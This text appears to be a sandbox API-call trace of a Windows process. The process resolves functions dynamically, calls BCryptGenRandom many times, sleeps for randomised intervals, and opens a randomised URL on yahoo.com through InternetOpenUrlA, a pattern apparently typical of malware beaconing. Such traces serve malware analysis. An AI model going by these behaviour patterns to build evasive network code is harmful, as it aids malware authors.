[0263.678] GetProcessHeap () returned 0x440000 [0263.678] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d4c40 | out: hHeap=0x440000) returned 1 [0263.678] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0263.678] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0263.678] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.679] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0263.679] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0263.679] Sleep (dwMilliseconds=0x18db5) [0263.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0263.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.859] GetProcessHeap () returned 0x440000 [0263.859] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0263.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0263.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.860] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.862] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b268, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a1b268) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.863] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.865] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.865] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.866] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.867] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.869] GetProcessHeap () returned 0x440000 [0263.869] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0263.869] lstrcpyA (in: lpString1=0x473770, lpString2="ÝÇÿ;s://www.yahoo.com" | out: lpString1="ÝÇÿ;s://www.yahoo.com") returned="ÝÇÿ;s://www.yahoo.com" [0263.869] lstrcatA (in: lpString1="ÝÇÿ;s://www.yahoo.com", lpString2="/ei3weenga1q9JjvC2Czy0k/y12ouabaku3s1ys17jpOqAt3nzpir9si89W/" | out: lpString1="ÝÇÿ;s://www.yahoo.com/ei3weenga1q9JjvC2Czy0k/y12ouabaku3s1ys17jpOqAt3nzpir9si89W/") returned="ÝÇÿ;s://www.yahoo.com/ei3weenga1q9JjvC2Czy0k/y12ouabaku3s1ys17jpOqAt3nzpir9si89W/" [0263.869] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0263.869] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ÝÇÿ;s://www.yahoo.com/ei3weenga1q9JjvC2Czy0k/y12ouabaku3s1ys17jpOqAt3nzpir9si89W/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0263.869] GetProcessHeap () returned 0x440000 [0263.869] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0263.869] GetProcessHeap () returned 0x440000 [0263.869] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0263.869] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0263.869] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0263.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0263.870] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0263.870] Sleep (dwMilliseconds=0x1b3c5) [0263.985] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0263.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.986] GetProcessHeap () returned 0x440000 [0263.986] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6090 [0263.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6091, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x4d6091) returned 0x0 [0263.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d60ab, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x4d60ab) returned 0x0 [0264.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.113] GetProcAddress 